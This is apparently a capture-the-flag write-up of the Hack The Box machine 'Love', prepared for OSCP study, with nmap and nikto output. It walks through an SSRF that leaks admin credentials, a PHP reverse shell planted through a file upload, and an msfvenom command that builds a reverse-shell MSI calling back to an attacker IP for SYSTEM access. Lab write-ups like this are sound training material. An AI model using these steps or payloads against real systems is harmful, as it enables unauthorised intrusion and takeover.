TJ_Null’s OSCP Prep – HTB – Love
This Windows machine have a SSRF vulnerability. Through SSRF we get credentials to a webserver hosting a voting system, that have a upload RCE that I’ll abuse to get reverse shell. The user have a registery that allows us to install .msi files as NT AUTHORITY\SYSTEM, giving is administrator access.
I’ll start with a NMAP scan.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# nmap -p- --min-rate 10000 10.10.10.239 -oN nmap.port
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:09 EST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.069s latency).
Not shown: 65461 closed tcp ports (reset), 55 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nmap.result 1 ⨯
# Nmap 7.92 scan initiated Sun Jan 23 16:05:38 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.031s latency).
Not shown: 65015 closed tcp ports (reset), 501 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-01-23T21:32:16+00:00; +23m28s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-23T13:32:03-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h23m28s, deviation: 4h00m01s, median: 23m27s
| smb2-time:
| date: 2022-01-23T21:32:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 16:08:49 2022 -- 1 IP address (1 host up) scanned in 191.40 seconds
I’ll note a couple of things before moving forward.
- The domain is love.htb.
- There is also a subdomain staging.love.htb.
- The webserver allows both HTTP and HTTPS
Table Of Contents
love.htb
It requires a Voters ID, which I dont have.
staging.love.htb
There is a “Free File Scanner” running on staging.love.htb/beta.php. This is probably vulnerable to SSRF and we could list resources we otherwise wouldnt be allowed to view.
https://love.htb
Vising https gives us a forbidden error.
Before moving forward I like to run nikto scan against the webserver.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nikto.result 4 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.239
+ Target Hostname: 10.10.10.239
+ Target Port: 80
+ Start Time: 2022-01-23 16:12:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-01-23 16:18:57 (GMT-5) (414 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There is a subdirectory called /admin.
Initial Acces – SSRF
SSRF is when a malicious user cause the webserver to make an additional or edited HTTP request to the resource of the attacker’s choosing. Since we have a couple ports open we could try to make a request to the webserver. After some enumeration I found that making a request to http://127.0.0.1:5000 gives us credentials to voting systems admin panel we found earlier.
After logging in, we are presented with a admin panel.
Shell as Phoebe
Using searchsploit we find that voting system is vulnerable to upload remote code exection.
Looking at the explanation for this RCE, we have to add a candidate and its possible to upload arbritray file when it asks us to upload a photo.
So first we have a to create Position.
Then I’ll add a candidate and upload a PHP reverse shell.
Visiting /images we can see that the payload is uploaded. I’ll start a netcat listener and open the shell.
Shell as NT AUTHORITY\SYSTEM
I’ll use carlospolops winpeas.exe to enumerate possible privilege escalation vectors.
I notice these two lines in the scan.
Reading hacktricks link.
Great, so I’ll create a .msi payload using msfvenom and upload it to the machine.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 -f msi -o rev.msiAfter uploading it to the machine, I’ll run the msi payload and start another netcat listener.
What I’ve learned
- If there is a possible SSRF vulnerabilty try to make a request to internal resources to see if there is anything intersting.
- Enumerating registry could give us a hint at possible privesc vectors. In this instance Phoebe could install msi file as NT AUTHORITY\SYSTEM.
- No every reverse shell will work right away. I had to try a couple of times to get the PHP reverse shell to give me a stable connection.
